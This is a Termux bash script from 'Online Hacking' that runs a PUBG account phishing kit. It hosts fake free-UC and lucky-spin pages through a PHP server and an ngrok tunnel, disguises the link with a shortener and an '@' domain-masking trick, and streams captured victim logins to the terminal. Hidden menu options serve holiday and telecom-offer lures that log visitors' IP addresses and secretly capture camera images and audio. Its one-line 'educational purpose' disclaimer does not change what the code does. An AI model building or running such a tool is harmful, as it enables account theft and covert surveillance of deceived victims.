#!/data/data/com.termux/files/usr/bin/bash
##############################################
#                                            #
#          CREATED : ONINE HACKING           #
#             AUTHOR: SUMAN                  #
#         ONLINE HACKING ©2021               #
#     EMAIL: info@onlinehacking.xyz          #
#           GAME PHISHING TOOLS              #              
#       created by :- s u m a n              #
#                                            #
##############################################


clear
echo ""
echo ""
echo -e "\e[32m                ============================================\e[m "
echo -e "\e[31m                [\e[32m★\e[31m]\e[93m Join us on Telegram : \e[95m@OnlineHacking\e[31m [\e[32m★\e[31m]\e[m "
echo -e "\e[32m                ============================================\e[m " 

# check the internet connectivity 
connection() {
while :
do
if curl -s --head  --request GET www.google.com | grep "200 OK" > /dev/null ; then
    echo -e "\e[1;92m>> \e[1;93m[\e[1;92m Active ●\e[1;93m ]\e[m"
    echo 
    sleep 3
    break
else
    echo -e "\e[1;92m>> \e[1;93m[\e[1;91m Inactive ●\e[1;93m ]\e[m"
    sleep 2
    echo
    echo -e "\e[1;92m>> \e[1;91mCheck your connection and Try Again!!\e[m"
    sleep 3
    echo
    exit
fi
done
}

#shark logo
shark_logo() {
clear
echo -e "\e[92m
SUMAN ©\e[34m
         ██████╗ ███╗   ██╗██╗     ██╗███╗   ██╗███████╗    
        ██╔═══██╗████╗  ██║██║     ██║████╗  ██║██╔════╝    
        ██║   ██║██╔██╗ ██║██║     ██║██╔██╗ ██║█████╗      
        ██║   ██║██║╚██╗██║██║     ██║██║╚██╗██║██╔══╝      
        ╚██████╔╝██║ ╚████║███████╗██║██║ ╚████║███████╗    
         ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚═╝╚═╝  ╚═══╝╚══════╝    
                                                            
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗██╗███╗   ██╗ ██████╗   
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██║████╗  ██║██╔════╝   
    ███████║███████║██║     █████╔╝ ██║██╔██╗ ██║██║  ███╗  
    ██╔══██║██╔══██║██║     ██╔═██╗ ██║██║╚██╗██║██║   ██║  
    ██║  ██║██║  ██║╚██████╗██║  ██╗██║██║ ╚████║╚██████╔╝  
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝ ╚═════╝   
ONLINE HACKING			  
							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.onlinehacking.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/OnlineHacKing \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/OnlineHacKing \e[0m\n"
}


echo 
echo 
echo -e "\e[31m[\e[32m★\e[31m]\e[32m This Tool is only educational purpose and we are not responsible for kind of illegal activity done by this tool\e[m "
sleep 2
echo 
echo 
echo -en "\e[31m[\e[32m*\e[31m]\e[32m Accepted This Notice (y/n)? \e[m "
read ans
if [ "$ans" != "${ans#[Yy]}" ]; then
echo 
echo 
echo -e "\e[92m>>\e[96m GAME PHISHING TOOL FOR ONLINE HACKING \e[m "
tput civis
sleep 4
tput cnorm
else 
exit
fi

#file_check Camera

file_check() {
if [ -d "/sdcard/Camera_hack" ]
then
echo
else 
mkdir /sdcard/Camera_hack
fi
}

#file_check1 Audio 

file_check1() {
if [ -d "/sdcard/Audio_hack" ]
then
echo
else 
mkdir /sdcard/Audio_hack
fi
}

#catch_ip camera

catch_ip() {

ip=$(grep -a 'IP:' ip.txt | cut -d " " -f2 | tr -d '\r')
IFS=$'\n'
printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] IP:\e[0m\e[1;77m %s\e[0m\n" $ip

cat ip.txt >> saved.ip.txt

}

#spin
spin_shark () {
local pid=$!
local delay=0.05
local spinstr='|/-\'
while [ "$(ps a | awk '{print $1}' | grep $pid)" ]; do
local temp=${spinstr#?}
tput civis
printf "\e[1;91m\r[\e[92m*\e[91m]\e[1;93m Setting up Online Hacking PUBG ID Hack Tool ... [\e[1;92m%c\e[1;93m]\e[0m  " "$spinstr"
local spinstr=$temp${spinstr%"$temp"}
sleep $delay
printf "\b\b\b\b\b\b"
done
printf "   \b\b\b"
tput cnorm
printf "\e[1;92m [Done]\e[0m"
echo
}

#spin
spin () {
local pid=$!
local delay=0.05
local spinstr='|/-\'
while [ "$(ps a | awk '{print $1}' | grep $pid)" ]; do
local temp=${spinstr#?}
tput civis
printf "\e[1;91m\r[\e[92m*\e[91m]\e[1;93m Fetching server ... [\e[1;92m%c\e[1;93m]\e[0m  " "$spinstr"
local spinstr=$temp${spinstr%"$temp"}
sleep $delay
printf "\b\b\b\b\b\b"
done
printf "   \b\b\b"
tput cnorm
printf "\e[1;92m [Done]\e[0m"
echo
}

spinner () {

local pid=$!
local delay=0.25
local spinner=( '█■■■■' '■█■■■' '■■█■■' '■■■█■' '■■■■█' )

while [ "$(ps a | awk '{print $1}' | grep $pid)" ]; do

for i in "${spinner[@]}"
do
	tput civis
	echo -ne "\033[1;91m\r[\e[1;92m*\e[1;91m]\e[1;93m Online Hacking Server ... \e[1;93m[\033[1;92m$i\033[1;93m]\033[0m   ";
	sleep $delay
	printf "\b\b\b\b\b\b\b\b";
done
done
printf "   \b\b\b\b\b"
tput cnorm
printf "\e[1;92m [Done]\e[0m";
echo "";
}

spinner1 () {

local pid=$!
local delay=0.25
local spinner=( '█■■■■' '■█■■■' '■■█■■' '■■■█■' '■■■■█' )

while [ "$(ps a | awk '{print $1}' | grep $pid)" ]; do

for i in "${spinner[@]}"
do
	tput civis
	echo -ne "\033[1;91m\r[\e[1;92m*\e[1;91m]\e[1;93m Masking Domain ... \e[1;93m[\033[1;92m$i\033[1;93m]\033[0m   ";
	sleep $delay
	printf "\b\b\b\b\b\b\b\b";
done
done
printf "   \b\b\b\b\b"
tput cnorm
printf "\e[1;92m [Done]\e[0m";
echo "";
}

php="$(ps -efw | grep php | grep -v grep | awk '{print $2}')"
ngrok="$(ps -efw | grep ngrok | grep -v grep | awk '{print $2}')"
kill -9 $php
kill -9 $ngrok

while :
do
clear
echo -e "\e[33m
      ██████╗ ██╗   ██╗██████╗  ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
      ██╔══██╗██║   ██║██╔══██╗██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
      ██████╔╝██║   ██║██████╔╝██║  ███╗█████╗███████║███████║██║     █████╔╝ 
      ██╔═══╝ ██║   ██║██╔══██╗██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ 
      ██║     ╚██████╔╝██████╔╝╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
      ╚═╝      ╚═════╝ ╚═════╝  ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝\e[0m\n"
echo -e "\e[95m
         ██████╗ ███╗   ██╗██╗     ██╗███╗   ██╗███████╗    
        ██╔═══██╗████╗  ██║██║     ██║████╗  ██║██╔════╝    
        ██║   ██║██╔██╗ ██║██║     ██║██╔██╗ ██║█████╗      
        ██║   ██║██║╚██╗██║██║     ██║██║╚██╗██║██╔══╝      
        ╚██████╔╝██║ ╚████║███████╗██║██║ ╚████║███████╗    
         ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚═╝╚═╝  ╚═══╝╚══════╝    
                                                            
     ██╗  ██╗ █████╗  ██████╗██╗  ██╗██╗███╗   ██╗ ██████╗   
     ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██║████╗  ██║██╔════╝   
     ███████║███████║██║     █████╔╝ ██║██╔██╗ ██║██║  ███╗  
     ██╔══██║██╔══██║██║     ██╔═██╗ ██║██║╚██╗██║██║   ██║  
     ██║  ██║██║  ██║╚██████╗██║  ██╗██║██║ ╚████║╚██████╔╝  
     ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝ ╚═════╝  \e[95;1m \e[0m\n"
  echo""    
  echo -e $'\e[1;33m\e[0m\e[1;33m    ██████████\e[0m'"\e[96m██████████"'\e[1;33m\e[0m\e[1;31m██████████\e[0m' '\e[1;32m\e[0m\e[1;32m PUBG ID Hack PHISHING TOOL \e[0m''\e[1;37m\e[0m\e[1;37m [v 2.2] \e[0m'                                       
  echo ""
   echo -e $'\e[1;33m\e[0m\e[1;33m  [ \e[0m\e[1;32m Follow on Github :- \e[36mhttps://github.com/OnlineHacKing/PUBG-Phishing \e[0m \e[1;32m\e[0m\e[1;33m] \e[0m'
   echo ""
      echo -e $'\e[1;37m\e[0m\e[1;37m    +-+-+-+-+-+-+ +-+-+-+-+-+-+-+ >>\e[0m'
      echo -e "\e[93m    |O|n|l|i|n|e| |H|a|c|k|i|n|g|"      
      echo -e $'\e[1;37m\e[0m\e[1;37m    +-+-+-+-+-+-+ +-+-+-+-+-+-+-+ >>\e[0m' 
      echo -e $'\e[1;37m\e[0m\e[1;37m    +-+-+-+-+-+ >>\e[0m'
      echo -e "\e[95m    |S|U|M|A|N|"      
      echo -e $'\e[1;37m\e[0m\e[1;37m    +-+-+-+-+-+ >>\e[0m' 
      echo ""     
banner(){
echo -e "\e[1;96m==================================================================\e[m "
echo " "
printf "\e[1;31m[\e[0m\e[1;92m01\e[0m\e[1;31m] \e[0m\e[1;37;44mFree UC Buy OH\e[0m"
echo
printf "\e[1;31m\e[0m\e[1;92m\e[0m\e[1;31m \e[0m\e[1;37;44m\e[0m"
echo
printf "\e[1;31m[\e[0m\e[1;92m02\e[0m\e[1;31m] \e[0m\e[1;37;41mLucky Spin OH\e[0m"
echo
printf "\e[1;31m\e[0m\e[1;92m\e[0m\e[1;31m \e[0m\e[1;37;44m\e[0m"
echo
printf "\e[1;31m[\e[0m\e[1;92m03\e[0m\e[1;31m] \e[0m\e[1;48;5;200mBonusChallenge Free Gift OH\e[0m"
echo
printf "\e[1;31m\e[0m\e[1;92m\e[0m\e[1;31m \e[0m\e[1;37;44m\e[0m"
echo
printf "\e[1;31m[\e[0m\e[1;92m99\e[0m\e[1;31m] \e[0m\e[1;91;102mExit\e[0m\n"
echo " "
echo -e "\e[1;96m==================================================================\e[m "
}


banner
echo 
ash() {
	sleep 0.5
	url_checker() {
	if [ ! "${1//:*}" = http ]; then
	if [ ! "${1//:*}" = https ]; then
	echo -e "\e[31m[!] Invalid URL. Please use http or https.\e[0m"
	exit 1
	fi
	fi
         }
        echo
	echo -e "\e[1;96m=============================================================\e[m "
        short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${link})
        shorter=${short#https://}
        echo
        read -p $'\e[1;91m[\e[1;92m~\e[1;91m]\e[1;92m Mask Your url domain here [\e[1;91mEx. https://facebook.com\e[1;92m ] :\e[m ' mask
        echo
        url_checker $mask
        echo -e "\e[1;96m>>\e[1;93m Enter some words you like to mention in url \e[1;92m[\e[1;92mEx.free-insta-followers\e[1;92m] \e[m "
	sleep 1
        echo
	echo -e "\e[1;96m>>\e[1;91m NOTE:\e[1;93m Don't use space in your words,\e[1;92m[\e[1;91minstead use \e[1;92m'-'\e[1;91m to avoid space\e[1;92m] \e[m "
	sleep 2
	echo
        read -p $'\e[1;91m[\e[1;92m~\e[1;91m]\e[1;92m Enter your words here :\e[0m ' words
        echo
	sleep 3
        final=$mask-$words@$shorter
        echo -e "\e[1;91m[\e[1;92m~\e[1;91m]\e[1;92m Your phishing url >>\e[m $final "
	echo
        }

ash1() {   
        echo;      
	echo `wget -q -O - http://tny.im/yourls-api.php?action=shorturl\&format=simple\&url=${link}\&keyword=$2`
	echo;
}

        read -p $'\e[1;91m[\e[1;92m~\e[1;91m]\e[1;93m Choose Your Option : \e[0m' option
	
         if [ $option = 01 ] || [ $option = 1 ]
         then
	                    cd /data/data/com.termux/files/usr/bin/phs
                            cd Free-UC-Buy-OH/
                            echo 
			    connection
			    ( sleep 5 ) &> /dev/null & spin_shark
			    php -S 127.0.0.1:4444 > /dev/null 2>&1 &    
			    sleep 1  
			    echo 
			    (sleep 6) &> /dev/null & spin
			    echo
			    tput civis
			    ./ngrok http 4444 > /dev/null 2>&1 & 
			    ( sleep 18 ) &> /dev/null & spinner
			    echo 
			    tput cnorm
			    link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io") 
			    ( sleep 6 ) &> /dev/null & spinner1
			    ash 
			    read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			    clear
			    shark_logo
			    echo 
			    echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			    echo 
			    echo -e "\e[96m========================\e[92m    SUMAN © 2021    \e[96m=========================\e[92m"
			    echo
			    touch log.txt >> /dev/null 2>&1
			    tail -f log.txt 
	
                            break;
			     
	 elif [ $option = 02 ] || [ $option = 2 ]
	 then
			   cd /data/data/com.termux/files/usr/bin/phs
                           cd Lucky-Spin-OH/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                      
			   ( sleep 6 ) &> /dev/null & spinner1
		           ash
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SUMAN © 2021    \e[96m========================= \e[92m"
                           echo 
			   touch log.txt >> /dev/null 2>&1
                           tail -f log.txt 

                           break;

	 elif [ $option = 03 ] || [ $option = 3 ]
	 then
		           cd /data/data/com.termux/files/usr/bin/phs
			   cd BonusChallenge-Free-Gift-OH/
			   echo 
			   connection
			   ( sleep 5 ) &> /dev/null & spin_shark
			   php -S 127.0.0.1:4444 > /dev/null 2>&1 &  
			   sleep 1
			   echo 
			   (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
			   ./ngrok http 4444 > /dev/null 2>&1 &
			   ( sleep 18 ) &> /dev/null & spinner
			   echo 
			   tput cnorm
			   link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
			   ( sleep 6 ) &> /dev/null & spinner1
			   ash
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
	        	   echo -e "\e[96m========================\e[92m    SUMAN © 2021    \e[96m========================= \e[92m"
			   echo
			   touch fbcracked.txt >> /dev/null 2>&1
			   tail -f fbcracked.txt
			   
                           break;
			   
		  elif [ $option = 31 ]
	          then        
		           
		           cd /data/data/com.termux/files/usr/bin/phs
			   cd Camera_hack
			   file_check
			   echo
			   clear
			   echo
			   echo -e "\e[1;32m >>> \e[1;93mChoose Your Tempelates\e[m"
			   echo
			   echo -e "\e[1;31m[\e[0m\e[1;77m 1 \e[0m\e[1;31m]\e[0m\e[1;32m Diwali \e[0m" 
			   echo
			   echo -e "\e[1;31m[\e[0m\e[1;77m 2 \e[0m\e[1;31m]\e[0m\e[1;32m Freinship Dare\e[0m" 
			   echo
			   echo -e "\e[1;31m[\e[0m\e[1;77m 3 \e[0m\e[1;31m]\e[0m\e[1;32m Freindship Day \e[0m"
			   echo
			   echo -e "\e[1;31m[\e[0m\e[1;77m 4 \e[0m\e[1;31m]\e[0m\e[1;32m Happy New Year \e[0m" 
			   echo
			   echo -e "\e[1;31m[\e[0m\e[1;77m 5 \e[0m\e[1;31m]\e[0m\e[1;32m Jio Offer \e[0m"
			   echo
			   read -p $'\e[1;91m[\e[0m\e[1;92m >>> \e[0m\e[1;91m]\e[0m\e[1;93m Enter Your Choice : \e[0m' page
			   if [ $page = 1 ]
			   then 
			   link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           sed 's+forwarding_link+'$link'+g' diwali.html > index2.html
                           sed 's+forwarding_link+'$link'+g' template.php > index.php
		           elif [ $page = 2 ]
		           then 
		           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
		           sed 's+forwarding_link+'$link'+g' freindship_dare.html > index2.html
			   sed 's+forwarding_link+'$link'+g' template.php > index.php
			   elif [ $page = 3 ]
			   then 
			   link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
			   sed 's+forwarding_link+'$link'+g' freinship_day.html > index2.html
			   sed 's+forwarding_link+'$link'+g' template.php > index.php
			   elif [ $page = 4 ]
			   then 
			   link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
			   sed 's+forwarding_link+'$link'+g' happy_new_year.html > index2.html
			   sed 's+forwarding_link+'$link'+g' template.php > index.php
			   elif [ $page = 5 ]
			   then 
			   link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
			   sed 's+forwarding_link+'$link'+g' jio_offer.html > index2.html
			   sed 's+forwarding_link+'$link'+g' template.php > index.php
			   fi
			   echo
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
		           ash
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo
			   while [ true ]; do
                           if [[ -e "ip.txt" ]]; then
			   printf "\n\e[1;92m[\e[0m+\e[1;92m] Target opened the link!\n"
			   echo
			   catch_ip
			   rm -rf ip.txt
			   fi
			   sleep 0.5
		           if [[ -e "Log.log" ]]; then
			   printf "\n\e[1;92m[\e[0m+\e[1;92m] Cam file received!\e[0m\n"
			   rm -rf Log.log
			   fi
			   sleep 0.5
			   mv cam* /sdcard/Camera_hack >> /dev/null 2>&1 
			   done
			   
			   break;
			   
	           elif [ $option = 32 ]
	           then 
		            cd /data/data/com.termux/files/usr/bin/phs
			    cd Audio_hack
		            file_check1
			    echo
			    default_redirect="https://www.youtube.com/channel/UCMhYgk0-nIHHtnRNkL9zpgQ/about"
                            printf "\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Choose a distracting website (Default:\e[0m\e[1;77m https://youtube.com\e[0m\e[1;92m ): \e[0m" $default_redirect
                            read redirect_link
                            redirect_link="${redirect_link:-${default_redirect}}"
			    link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
			    sed 's+forwarding_link+'$link'+g' template.php > index.php
			    sed 's+redirect_link+'$redirect_link'+g' js/_app.js > js/app.js
			    echo
			    connection
                            ( sleep 5 ) &> /dev/null & spin_shark
                            php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                            sleep 1
                            echo 
                            (sleep 6) &> /dev/null & spin
			    echo
			     tput civis
                            ./ngrok http 4444 > /dev/null 2>&1 &
                            ( sleep 18 ) &> /dev/null & spinner
                             echo 
			    tput cnorm
                            link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			    ( sleep 6 ) &> /dev/null & spinner1
		            ash
			    read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			    clear
			    shark_logo
			    echo 
			    echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			    echo 
			    echo -e "\e[96m========================\e[92m    SHARK © 2021    \e[96m========================= \e[92m"
                            echo
		            while [ true ]; do
                            if [[ -e "ip.txt" ]]; then
		 	    printf "\n\e[1;92m[\e[0m+\e[1;92m] Target opened the link!\n"
			    echo
			    catch_ip
			    rm -rf ip.txt
			    fi
			    sleep 0.5
		            if [[ -e "Log.log" ]]; then
			    printf "\n\e[1;92m[\e[0m+\e[1;92m] Audio received!\e[0m\n"
			    rm -rf Log.log
			    fi
			    sleep 0.5
			    mv 20* /sdcard/Audio_hack >> /dev/null 2>&1 
			    done
			   
		            break;
			   
	          elif [ $option = 99 ]
	          then     
		      echo
		      exit 
		      break;
		      
                  else 
		  
		  echo
		  echo -e "\e[92m[\e[94m!\e[92m]\e[91m Invalid option Try Again !! \e[m "
		  sleep 2
		  fi
                  done
		  
		  
#####################################################################
#                                                                   #
#      simply changing this banner will not make you developer      #
#           CREATED BY ONINE HACKING - SUMAN                        #
#                   KEEP SUPPORTING                                 #
#                      THANKYOU                                     #
#                                                                   #
#####################################################################
